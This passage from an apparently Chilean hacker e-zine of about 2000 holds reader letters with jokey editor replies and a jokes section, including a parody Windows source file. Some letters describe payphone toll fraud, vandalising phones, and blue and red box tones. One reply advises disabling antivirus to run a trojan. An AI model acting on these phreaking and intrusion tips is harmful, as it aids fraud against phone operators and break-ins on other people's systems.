por hackear... sino que por la poca tolerancia que hay en cuanto a
pensamiento politico... siendo sinceros , queremos libertad y seguimos con la
intolerancia fasista que a mucha gente le costo la vida... al parecer no
nos queda respeto, ni siquiera autoestima, pedimos una red libre para
expresar nuestras ideas, perfecto, pero es necesario tratar a otra gente
despectivamente solo por tener otro punto de vista?
[Bla, bla, bla, bla, yo cero de politica... y que decir pues ya las
elecciones pasaron y al final ya sabes quien gano, asi que no te quejes]
Lamentablemente no conparto que esa page figure ahi como un gran logro,
siendo que ese server estaba incluso botado en cuanto a seguridad se trata,
en comparacion con el otro candidato, ahi si se nota la plata , o no?...
[????]
bueno, pero ese es otro cuento... no les voy a pedir que saquen esa page de
ahi ni mucho menos, la page es suya y estan en todo su derecho, solo quiero
que sepan que es saludable practicar ademas de predicar y caer en
contradicciopnes tan grandes dan mucho que pensar...
[Insisto... esa seccion dio mucho de que hablar, por eso la sacamos, que tal
que las paginas si fueran nuestras... creo que nos colgaria de las ....]
Eso es todo, lamento importunarlos de esta forma ya que cacho que no tienen
ni ganas de recivir este tipo de comentarios en su correo, pero bueno, tenia
que hacer el comentario, saludos a MoonSpell, PlaXiuS y algunos otros del
grupo con los que he tenido el gusto de compartir ratos en el irc, sigan con
su iniciativa, es excelente... hasta otra.
VIRKOFF...
[Falte yo...]
" El saber me persigue...
pero yo soy mas veloz."
[Se nota..!! XDDD ]
[PLX: Bueno VIRKOFF , Taker ya lo ha dicho .. nosotros no tenemos nada que
ver con las cracked pages ... no nos metemos en politicas y las libertades
en las cuales creemos no se refieren al politiquerismo ... creo que lo he
comentado mas de una vez en esta seccion.... si hubiera sido la pagina del
otro candidato tambien la hubieramos puesto ... Ademas los mismo que
crackearon esta page crackearon la pagina de la UDI lo cual demuestra
"IGUALDAD PARA TODOS" no era ese el slogan de la campana de Lagos XDDD
... saludos y no te calientes la cabeza por ideales politicos personalmente
creo que es una perdida de tiempo]
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
Subject: Ezine...
Date: Mon, 20 Dec 1999 21:41:44 -0600
From: Manuel Briones Cortes <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To: <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Que tal amigo de proyecto_r
Les envio este mail con el fin de informarles que FUSiON BBS esta dispuesta a
ser su casa en el medio de las poquisimas bbs que estan quedando, durante
todo el tiempo que nos quede de vida =), con el proposito de poder masificar
un poco las bbs y que vuelvan a ser un poco lo que fueron hace algunos a~os.
En este ultimo a~o desaparecieron el 90% de los pocos sistemas de este estilo
que quedaban, y eso es bastante grave, creo que en este momento solo quedan 6
bbs en Santiago y unas pocas en provincias (Inquisicion, FUSiON, Daniga,
Araucaria, AMT, TCM). Por lo cual me interesa integrar muchos mas grupos y
contenidos dentro del bbs... ademas ustedes estan conscientes que hasta ahora
la concentracion de hackers, crackers, etc. se encuentran dentro de las bbs
=).
[Ya saben los chilenos FUSiON BBS los espera... a mi me queda un poco dificil
ensayen y me cuentan... ya saben donde encontrarme...]
Saludos
Sysop FUSiON BBS.
PD: FUSiON BBS funciona todos los dias las 24 horas en el siguiente numero:
7725671 n81 ANSI COLOR
[PLX: Bueno ya saben chikos .. a bbsear .. o nacieron en la edad del IRC]
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
Subject:
Date: Wed, 29 Dec 1999 08:02:38 -0800 (PST)
From: enfermo enfermo <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
CC:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Wolas, saben soy un chileno, no soy un hacker, tal vez quepa dentro de los
newbies, soy solo un aprendiz se que debo seguir en esto a~os pa terminar
siendo un verdadero hacker, este es solo mi primer a~o que estoy en el tema,
[Bahhh, y yo que solo llevo 3 meses...]
su sitio Bakan, antes no habia cachado ningun grupo de hackers, en chile,
solo espa~a argentina etc,. Me gusto su pagina , sus ideas , etc, ya baje las
revistas y espero estar en casa ap leerlas , es que no estoy en la casa si no
en mi colegio, NO NO soy un ahueonado , un lammer etcc.. solo que tengo una
peque~a adiccion, ademas de que como vivo en un pueblo rechico me que da a 10
min a pata la huea de colegio, y pa mas cacha tienen internet y en mi casa tb
tengo pero solo mi hmna mayor tiene idea de que tengo, por que antes me
colfgaba de una empresa y salio harta plata (era de santiago) y me retaron
poqueito y me castigaron poquito, pero eso paso hace tiempo, harto time,.
[No te parece que escribes un poco enredado..???]
que mas me gustari seguir en contacto, me email,:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
(ni
ese ni este son los mios, pero yo los miro) un bug que una vez le descubrimos
[Mal hecho, como dicen por ahi, todo chileno tiene derecho a tener su email
XDDDD, asi no andas leyendo los correos de otros]
a esos telefonos inteligentes esos verdes con casita y todo, aunque aca por
lo menos lo repararon, era que al momento en que ,descolgabas, justo cuando
no habia tono y si lo habia apretabas el 1er boton de la segunda corrida de
abajo, y marcaba un pito y como 4 numeros y decia gracias y listo pa llamar a
todos lados, yo me hice la america llamando a amigos de stgo (antes era de
alla), pero sucedio que habia una mina de intercambio de suecia y se supo y
la mina (era mas huena...ke uhhh) y la huenoa todas las tardes llamado pa
suecia y hablando desde las una hasta las 8 y ahi al sgte mes arreglaron las
hueas, pero ahora con mi grupo (hay otro mas que le gusta la computacion
etc.)
[Vaya, hubieras avisado antes... las cosas hay que compartirlas no..???]
sol nos limitamos a robarles los auricual.. bueno esas hueas pa hablar. con
una sierra y un tiron y listo!!!
ahora estoy intentanto cachar como robarle la pantalla y abrir un pedazo, con
un destornillador se puede, solo que no he tenido la oportunidad de salirde
noche por que estoy castigado,aunque hasta new year, porque¿? porque llegue
tarde a micasa, mi vieja me fue a buscar, (de 4a 5 se dio vueltas por este
pueblo de mierda) y no me encontro (por suerte) llegue ..ni yo me acuerdo la
hora si al dia sgte seguia invocando a huajardo!!!
[Mala cosa, si no sabias eso es delito, y podrias caer en manos del Gran
Hermano... aunque con lo aguevonados que son..!!!]
EnoTs
[DDDDXXXX ???..sarta aicah ribircse ed ose se omoc ,satnevni et sarar sasoc
euq ,stone ayaV]
[PLX: Bueno un buen ejemplo de un ataque a fuerza bruta al sistema
telefonico]
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
Subject: Kr@ckerZ United team 2000
Date: Sun, 02 Jan 2000 18:10:12 GMT
From: "MANIAC PCMAN" <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Mensaje :
Hola, muy bueno el zine Chilensi... ¡Puta! .. como no lo he visto antes!
Les cuento a ver si les podemos ayudar en sus zines (si es que sacan otra
=)....
[Pues ya ves, la acabamos de sacar ;), aunque tengo que confesar que nos dio
muy duro..!!!]
Les cuento que somos del tipo cracker (del a), y nuestro grupo consta de 9
giles 'krakiadores', del cual 5 son Chilensis y yo soy el 'president'...
[Wowwww, felicitaciones...!!! veo que te leiste PR 1... o la copia en KSH...
cualquiera de los dos..!!!]
- se para que es el 'debug' del ftp y como usarlo de forma da~ina y buena
(claro, para que usarla mal?, no soy asi)... Es cosa de puro ASM...
[Uffff, puedo ser tu amigo..??? di que si... di que si..!!!]
Puta .. esta creando un compadre Chileno un 'Spanish Crack Zine'. NADA
DA~INO!!! me gustaria que visitaras las sgtes. paginas para que te diras
cuenta que si puedes agregarle mas cosas buenas al cracking bueno por que
trata acera de demasiadas cosas que realmente son buenas =)
[Venga deja ya las putas groserias, no ves que estamos en Horario familiar...
y otra cosa, me hubiera gustado visitar las paginas, pero nunca me dijiste
cuales erannn...]
Bueno, el Phraking funciono perfectamente para mi .. je je ...
Chao..
Esperamos respuesta :
Maniac PC
PD: Del Norte pu'~o
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
Subject: WolaXs
Date: Sun, 2 Jan 2000 17:08:50 -0800 (PST)
From: enfermo enfermo <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
hi's aca de new, 1ero cache una pagina hackeada por un compatriota, que mejor
!!! la direccion es www.adrianna.com no se si ustedes la tendran een su
index de apg hackeadas, pero igual.
[No, esa seccion ya no existe... van dos... ]
OiGaN The revista, BaKannN es puta pero es qeu genial !! Ojalas q' sigan
asip. Es lo mejor, pero tengo unas dudas, he intentado blue box pero no
pasa na cuando mando los 2600 (sera qeu aca estan los 2400, o que¿?) igual es
un software, aun no he konstruido na' por falta de $$ mas que na,!!
[Pillin, no ves que ahora la lineas tienen filtros, por eso no te funciona.]
Me gustaria qeu metieran MaS phreack, en la revista, per qeu pa gente como yo
que ni mi vieja sabe que me conecto, es util,, otra consurtam. los 2200+1700
hz, tb son aca (o sea las red box, aun no he opdido cacahr porque mi hmna me
tine mi personal y no esta ak'.
[Sencillo, te subes al techo y pinchas la linea telefonica del vecino XDDD,
pero luego no te vengas a quejar cuando estes tras las rejas...]
Tamos todos ansiosos por the NeXT number y sigan como Van, pro que Van La
RasJa !!!
Ah alguien De La VI region, mandar email a
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
(el nombre
esta inspirado en un passwor de un server qeu me paso un amigo hace very
time!!!)
ViVa La revolucion, Mov.Rev. Grözny . (Mafia Lokal)
EnoTs
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
Subject: por fin !!!!
Date: Mon, 03 Jan 2000 22:25:41 +000
From: "Mastroianni" <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Por fin instale el maravilloso linux en mi computador.
[Que grande sos..!!! te felicito, yo llevo 3 a~os intentando y no he podido
..!!!]
pero ahora tengo un gran problema, he buscado manuales de linux pero no he
encontrado, o sea, he encontrado manuales pero muy avanzados. mi problema es
que no conosco los comandos basicos.
[Vaya, seguro que estas buscando bien..???, eso es lo que mas se encuentra en
la red, desde los basicos hasta los mas complicados que no los entiende ni
mandrake...]
hasta ahora ls, cat, exit y nada mas !!! ( y help ;) ni siquiera se editar un
archivo :( y todos los manuales que he encontrado hablan de como conectarse a
internet, como recompilar el kernel, etc. pero ninguno con los comandos
basicos.
tampoco se como abrir un archivo en A: , bueno ustedes me entienden. ojala me
ayuden. caho.
[Incluso en unas R pasadas hay temas sobre Linux, y en esta encontraras un
articulo (aunque un poco viejo ya)]
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
Subject:
Date: Thu, 6 Jan 2000 18:18:19 -0600 (CST)
From: Zomba - <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Hola Proyecto R,
Los felicito por la ezine, estan haciendo un buen trabajo y representando muy
bien a Chile. Pero el objetivo de mi email no es felicitarlo, no por que no
lo merezcan ni mucho menos, sino que les queria contar que hemos sacado la
primer edicion de nuestra ezine llamada: HEH!
[Mas e-zines, para que despues algunos digan por ahi que no encuentran
material para estudiar...]
Al parecer somos la unica ezine Argentina que esta "viva" en estos momentos y
esperamos continuar asi varios anios mas. Bueno, como veran la intencion de
mi email es que le den un vistazo y esperamos comentarios/criticas/etc
tambien queriamos de esta forma, mantener un contacto mas cercano con
distintas ezines hispanas, y es por eso que les escribimos
La ezine se encuentra en:
http://www.digitalrebel.net/heh
A la espera de una respuesta
[Sin comentarios... las criticas y comentarios se fueron a tu e-mail ;)]
Los Saluda
Zomba
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
http://www.digitalrebel.net
[Bahhh, no quito el @yahoo.com porque ya saben donde encontrarlo, ademas me
da pereza ir hasta la tecla Supr XDDD]
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
Subject: Hola
Date: Tue, 11 Jan 2000 01:53:14 -0500
From: Mario Bueno <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Hola amigos de E-zine :
Mi nombre es Mario, les escribo por una razon muy simple, leo constantemente
sus suscripciones y la verdad es que no entiendo casi nada..
[Hay dos posibilidades, 1. esperas que la tecnologia sea mas accesible y te
instalas un chip de inteligencia en el cerebro, o 2. definitivamente dejas de
leernos.]
Bueno, a mi no me interesa para nada el hackeo en irc ya que lo hayo poco
interesante y absurdo..
[hackeo en IRC, hablas de tomar posesion de canales...???, eso no es hackear]
Yo no se nada e hackear pero me intereso mucho en el tema y trato de aprender
todo lo posible en el tema pero no tengo a nadie a quien preguntar mis dudas.
[Ohhh, y ahora quien podra ayudarte...???]
tengo 21 a~os y siento que puedo hacer algo en la red pero no se abrir las
puertas, por eso acudo a uds. me imagino que les escribiran muchas personas
[Intentaste con la llave amarilla, si, si, esa que esta al lado izquierdo
sobre el florero]
pidiendo la misma ayuda que yo les pido, pero tenia que intentarlo, yo por mi
parte he logrado meterme a unas cuentas de correo algo que me ha sido muy
gfacil ya que conosco a los prietarios, pero creo que ya es hora de hacer
nuevas cosas......
[Y le has encontrado gracia a eso de leer correos ajenos..???...]
Bueno me despido y espero que me respodan.
los felicito por su revista y por su pasion por el tema, se despide un
ignorante en la materia pero con hambre de conocimientos..
[Creo que antes de empezar a pedir cosas deberias sentarte a pensar que lo
que en relidad quieres ser... y no ir diciendo quiero ser esto, o quiero ser
lo otro, sin saber siquiera cual es el verdadero significado de esto o lo
otro, en fin, esa es la idea.]
MARIO ....
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
From: ksh team <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To: <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Sent: Friday, March 24, 2000 3:04 PM
Subject: Nuevo E-zine !!!
Hola que tal gente del hack...
El motivo de este mensaje es para informar del surgimiento de un Nuevo E-zine
hispano...
[Lo dicho, esta de moda sacar e-zines... Incluso nosotros ya tenemos una...]
El Nombre es KsH "Knowledge's Slaves Hacker" (Esclavos del Conocimiento
Hacker), un Grupo de Origen Dominicano que espera aportarle al Hack hispano
todos los conocimientos adquiridos, en gran parte de grupos tan importantes
como ustedes...
[Mmmm, ahora entiendo el porque..!!! claro, plaxius, aqui esta la razon..!!]
Nuestra Web es: http://kshezine.cjb.net
Y en pocos dias estara disponible Nuestro e-zine Numero 2. (El KsH 2)...
Los temas que trataremos seran H/P/V/C...
Esperamos ser apoyados por ustedes, para que asi la comunidad Hack hispana
siga creciendo...
AtT:
-=Kralj Killer=-
Co-Editor de KsH
[PLX: Bueno saludos y que continuen adelante con el proyecto .. es muy duro
llevar un E-Zine ... esperamos que perduren en el time....]
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
From: "--==@DarkPort@==--" <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To: <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Subject: portal
Date: Sat, 1 Apr 2000 01:18:19 +0200
Hola:
Estoy desarrollando un portal alternativo (DarkPort) totalmente distinto a
los existentes, en el que van a tener cabida todas las webs que tratens
sobre: mp3, emuladores, decodificadores, abandonware, hacking, cracking,
phreaking, warez, privacidad, criptografia, seguridad, encriptacion, appz,
juegos, recursos gratuitos.
[En fin, con lo mismo que contienen las demas ... bueno, espero que no tenga
fondo negro... Siiiiii, si tiene fondo negro... bueno, al menos no tiene
calaveras...]
Si eres webmaster de alguna web sobre este tema dirigete a:
http://darkport.turincon.com/ y enlazate.
[Webmaster, mmm, lo tenia por aqui en el bolsillo... mmmm, no no lo encuentro
otro dia sera.]
Ahora esta solo la portada y muy poco acabada; a medida que vayais dando de
alta vuestras webs ira cambiando el aspecto.
Pienso que es buena idea, la de un portal de estas caracteristicas; vosotros
lo confirmareis ;-).
[Os tengo que confesar que en la seccion abandonware encontre uno de los
juegos que mas me ha encarretado.. El dia del tentaculo... un poco viejo,
pero me sirvio para recordar aquellos tiempos... snif, snif... ;( ]
--
Un saludo
A9 DARKport
http://darkport.turincon.com/
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
" El Portal underGrown de internet "
[Dijo undergrown o dijo underground..??? ]
[PLX:Bueno solo decir que el sitio se ve bastante interesante aunque no lo
he navegado en profundidad .. me parece buena la idea ... siempre y cuando
no existan fines comerciales detras de esto, ya que el hacking hoy en dia
es mas que nada una moda ... saludos]
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
From: "rain" <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To: <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Date: Fri, 14 Apr 2000 22:49:14 -0400
holas compadres les mando este mail para decirles que el proyecto r es muy
bueno y sigan tirando parriba con los proximos e-zines y me parece muy bien
que hayan movimientos impulsores al under aunque yo no lo sea pero me gusta
estar al tanto de las cosas "si los mal interprete con movimiento impulsor al
under "zorry :)
pero igual sigan dandole no mas con el e-zine "made in chile" y que los demas
se den cuenta y dejen de buscar afuera y se den cuenta que lo mejor siempre
esta dentro "sin menospresiar alos demas"....vamos cauros sigan con su propio
estilo de decir las cosas tal y como son.
"VIVA CHILE"
rain
[No comments... :? ]
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
From: "timothy Drake Grayson" <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
Subject: pthief tiene un virus....creo..
Date: Sun, 16 Apr 2000 16:31:02 GMT
Hola compa~eros de la R, ke tal.
[Bien, muy bien...]
Aca les escribe to4s7 de FYE, pa saludarlos y pa avisarles , ke taba bajando
el pthief, y el mcafee le detecto 2 virus, el archivo propiamente tal y el
.dll, asi ke echenle un ojo, y si el pc los detecta como virus, pero no hacen
nada, me avisan ok?
[A ver, resulta que el pthief es un troyano, y como tal los antivirus
saltan cuando se dan cuenta que esta en el sistema. por eso es, si lo
quieres utilizar debes desactivar el antivirus, mmm eso si, no me hago
responsable de lo que le pueda pasar a tu sistema]
Weno, me despido de uds, nuestros inspiradores
To4s7
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
From: cyberboy <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
To: <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Sent: Tuesday, April 18, 2000 9:25 PM
Subject: Saludos y cell phrealing
Hola lokos de la R, me gusta mucho la e-zine y la sigo desde que moonspell me
paso el dato (hace como 2 a~os maoma...) me gustaria que publicaran algo de
celulares, como sacar los menus tecnicos y cosas por el estilo para los
celulares que hay en chile, porque siempre hay weas de otras partes...yo
estoy probando algunos codes con los celulares que tengo a mano, los
comprobados se los envio cuando pueda.
[A mi tambien me gustaria tener a alguien que aporte sobre telefonia celular,
pero la verdad ha sido algo dificil conseguir gente con verdaderos
conocimientos sobre el tema, pues gente si se consigue, pero son puros bla
bla bla, mucho hablan y dicen que saben y a la final no resultan con nada,
ese es el lio... a ver si alguien se pone en la tarea.]
Chao y sigan con su e-zine!!!
Cyberboy
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
"La anarquia y la revelion no se venden en un mall"
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
To:
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
From: "
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
" <
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
>
Date: Mon, 1 May 2000 17:31:53 -0400
Subject: Saludos
Hola amigos de Proyecto_r:
Mi razon de este emilio es para pedirles una peque~a ayuda en un problema que
tube en otro dia en el IRC, habian como tres personas que entraron
a mi PC en
[Wowww, menudos contorsionistas, a lo mejor trabajan en un circo o algo
por el estilo, que eso de caber en un pc, y para mas vaina tres..!!!]
realidad no se si entraron, lo que pasa es que tenia instalado el Netbus o
algo asi (no me acuerdo el nombre) la cosa es que desde ahi mi PC me dio
cualquier drama, a un cierto tiempo de entrar a interdent se quedaba
pegado y nada me
[Interdent, eso me suena a dentisteria.. y la verdad no me gustan... ahh y
minimo el netbus te lo instalaste tratando de joderle la vida a otras
personas...]
respondia, la unica solucion era resetear y cada vez que me conectaba me
pasaba lo mismo, y tube una gran idea......... Formatear el C: en realidad
solo lo restaure
[grandioso, el unico error fue no instalar otro sistema operativo..]
con unos CDs que venian con el, lo importante es que perdi cualquier programa
que tenia y toda mi informacion, ahora se que la cage pero en una parte fue
bueno por que tenia puras hue......
Les agradeceria me respondieran y me aconsejaran alguna forma de evitar que
entren o hagan algo a mi PC, lo que pasa es que he conocido cualquier mina
en el IRC y
[La mejor forma de evitar que entren a tu pc es mantenerlo desconectado de la
red, tambien puedes ver la posibilidad de trabajar en el sin disco duro, asi
evitas que alguien accese tus datos, y para mayor seguridad trabaja en el
con la pantalla apagada, puede que asi evites que te hagan shoulder
surfing... seguro que tomando estas precauciones estaras mas seguro.]
seria muy hue... si no entro mas por culpa de estos pelotas que se dedican
a cagarte, me interesa todo relacionado con el hacker pero no para destruir
cosas que no son tuyas.
[mmmmm, lo que hace uno por las mujeres ..!!!]
De antemano muchas gracias, a todo esto solo he leido la 1. revista suya y
recien baje las otras y dejenme felicitarlos por el gran trabajo que hacen,
tengo unas sugerencias pero se las enviare luego de leer los otros N.s,
Felicitaciones...
[gracias, muy amable, espero que te sirvan mis concejos..!!! XDDD ]
[PLX:Busca algun software que proteja tus puertos ..Firewal Conceal, utiliza
un buen antivirus, y ni ejecutes cualquier cosa que te llegue por correo o
por DCC]
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:
-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-:-
..--:: 16. Chistes, Cuentos y otras Burradas ::--..
By Varios
Bueno esta seccion se ha hecho su espacio en la Proyecto R, hemos recibido
varias criticas pero al mismo tiempo hay mucha gente que se divierte con esta
seccion, me incluyo .. me hace mas grato las idas al WC (es el unico lugar
donde te puedes concentrar para estudiar).
Solo falta agradecer a la lista de correo la CARAJADA
http://get.to/la.carajada
que nos permiten publicar sus chistes y a la gente de:
http://www.micarrete.cl
que tambien han colaborado en esta seccion...
:::: Código fuente de Windows 2000 ::::::::::::::::::::::::::::::::::::::::::
#include "Win30.h"
#include "Win31.h"
#include "Win95.h"
#include "AlgoMas.h"
#include "CodigoAntiguo.h"
#include "NormasDeBillGates.h"
#include "CosasDeRelleno.h"
#include "Monopoly.h"
#define INSTALAR TODO_SIN_EXCEPCION_Y_A_LO_BESTIA
#define CASCAR -5483021548692487811456214478252114545621
static char Escritorio[16000000]; /* 16 Mb */
static char Accesorios[8000000]; /* 8 Mb */
static char Explorer4[4000000]; /* 4 Mb */
static char ProgramasDeUsuario[2000000]; /* 2 Mb */
static char MemoriaLibre[2000000]; /* 2 Mb */
int main()
{
while (NoCasque())
{
MostrarMensajeCopyright();
MostrarMensajeNormasBillGates();
DesactivarBotonReset();
BucleParaNoHacerNada();
if (PRIMERA_INSTALACION)
{
while (TamanyoDiscoSwap() < (ESPACIO_PARA_WINDOWS_ENTERITO * 5))
{
Ocupar50MbParaDiscoDeSwap();
BucleParaNoHacerNada();
}
EliminarSistemaDeArchivosHPFS();
EliminarCualquierRastroDeOS2();
DeshabilitarInstalacionDeNetscape();
DeshabilitarInstalacionDeRealPlayer();
if (QuedaAlgunRastroSospechoso())
ColgarSistema();
}
MostrarAlgunaCosaBonitaPeroInutil();
MostrarMensajeCopyrightOtraVez();
BucleParaNoHacerNada();
HacerVerQueHaceAlgo();
if (SigueSinCascar())
{
MostrarMensajeCopyrightOtraVez();
BucleParaNoHacerNada();
EjecutarWin31();
if (AunSigueSinCascar())
EjecutarWin30();
BucleParaNoHacerNada_1();
BucleParaNoHacerNada_2();
BucleParaNoHacerNada_3();
BucleParaNoHacerNada_Etcetera();
}
if (UsuarioNoAceptaWindowsComoAlgoUtil())
goto VETE_A_SABER_DONDE;
if (SeHaDetectadoCache())
DeshabilitarCache();
if (CPU_Rapida())
{
EstablecerEstadosDeEspera(MUCHISIMOS);
EstablecerRaton(VELOCIDAD, MUY_LENTO);
EstablecerRaton(ACCION, DESPLAZARSE_A_SALTOS);
EstablecerRaton(REACCION, A_VECES);
EstablecerTeclado(VELOCIDAD_PARPADEO, MUY_LENTO);
EstablecerTeclado(VELOCIDAD_REPETICION, MUY_LENTO);
}
/* printf("Bienvenido a Windows 3.0"); */
/* printf("Bienvenido a Windows 3.1"); */
/* printf("Bienvenido a Windows 95"); */
/* printf("Bienvenido a Windows 98"); */
printf("Bienvenido a Windows 2000");
if (CPU != INTEL)
{
DeshabilitarRaton();
DesconfigurarTeclado();
ColgarSistema(INDICADOR_MSDOS);
}
else
{
MemoriaDeSistema = open("a:\swp0001.swp", O_CREATE);
while (NoHayaSuficienteEspacioEnDisco())
printf("Inserte un nuevo disco en la unidad A:");
}
while (NOS_SALGA_DE_LOS_HUEVOS)
{
sleep(5000);
ObtenerEntradaUsuario();
sleep(5000);
ReaccionarAPeticionUsuario();
}
if (ObtenerNumeroAlAzar() != BINGOOOO)
GenerarErrorDeProteccionGeneral();
/* Fin de bucle principal */
}
/* Finalizar sesión */
if (AunNoHaCascadoDelTodo())
{
if (ObtenerOtroNumeroAlAzar() != BINGOOOO)
{
MandarExplorerALaMierda();
if (HayAlgoAbierto())
{
Accion = MostrarMensaje("¿Desea guardar los datos?");
if (Accion == SI)
GuardarDatos_JAJAJA();
MandarloTodoAlCarajo();
}
}
printf("Windows se está cerrando");
while (HAYA_PRISA)
sleep(5000);
if (UsuarioYaLlegaTardeDondeTeniaQueIr())
printf("Ahora puede apagar el equipo.");
}
return ((int)((long)((float)((double)((re double)CASCAR)))));
}
:::Las 10 mejores frases para ser dichas si te pillan durmiendo en el
trabajo o en una reunion:::::::::::::::::::::::::::::::::::::::::::::::::::::
1) - "Me dijeron en el banco de sangre que esto podia suceder...".
2) - "Es soolo una siesta de 15 minutos para recuperar las
energias, como me enseñaron en el curso de gerenciamiento de tiempo
que ustedes me mandaron hacer."
3) - "Estaba imaginando como es la vida de un ciego..."
4) - "No estaba durmiendo! estaba meditando sobre la mision de la empresa y
intentando descubrir un nuevo paradigma..."
5) - "Queria verificar si mi teclado es a prueba de baba..."
6) - "Estaba haciendo un ejercicio altamente especifico de Yoga para
aliviar el estres del trabajo. Ustedes discriminan a las personas que
practican Yoga?"
7) - "Por que me interrumpio? Casi estaba llegando a una solucion para
nuestro mayor problema..."
8) - "La maquina del cafe esta malograda..."
9) - "Alguien debe haber puesto cafe descafeinado en el frasco equivocado."
Pero de todas estas es la mejor escapatória es:
10) - "... en nombre del Padre, del Hijo y del Espíritu Santo.
Amén..."
::EL EXITO ES CICLICO::::::::::::::::::::::::::::::::::::::::::::::::::::::::
A los 4 anos, tener exito es no hacerte pipi en los pantalones.
A los 12 anos, tener exito es tener amigos.
A los 20 anos, tener exito es tener relaciones sexuales.
A los 35 anos, tener exito es tener dinero.
A los 65 anos, tener exito es tener relaciones sexuales.
A los 75 anos, tener exito es tener amigos ... vivos.
A los 85 anos, tener exito es no hacerte pipi en los pantalones..
:::::::MORALEJA::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Un matrimonio fue invitado a una fiesta de mascaras y disfraces.
A ella le dolia muchisimo la cabeza, y entonces le dijo al marido que fuera
solo. El protesto, pero ella le dijo que se iba a tomar una aspirina y se iba
a ir a la cama, y que no habia necesidad de que el se quedara en la casa. Asi
que el marido se puso el disfraz y se fue.
La mujer, despues de dormir una hora, se desperto bien, sin dolor.
Como era temprano, decidio ir a la fiesta. Como el marido no sabia cual era
su disfraz, ella penso que seria divertido observar como actuaba cuando
estaba solo. Ella llego a la fiesta y enseguida vio al marido bailando en la
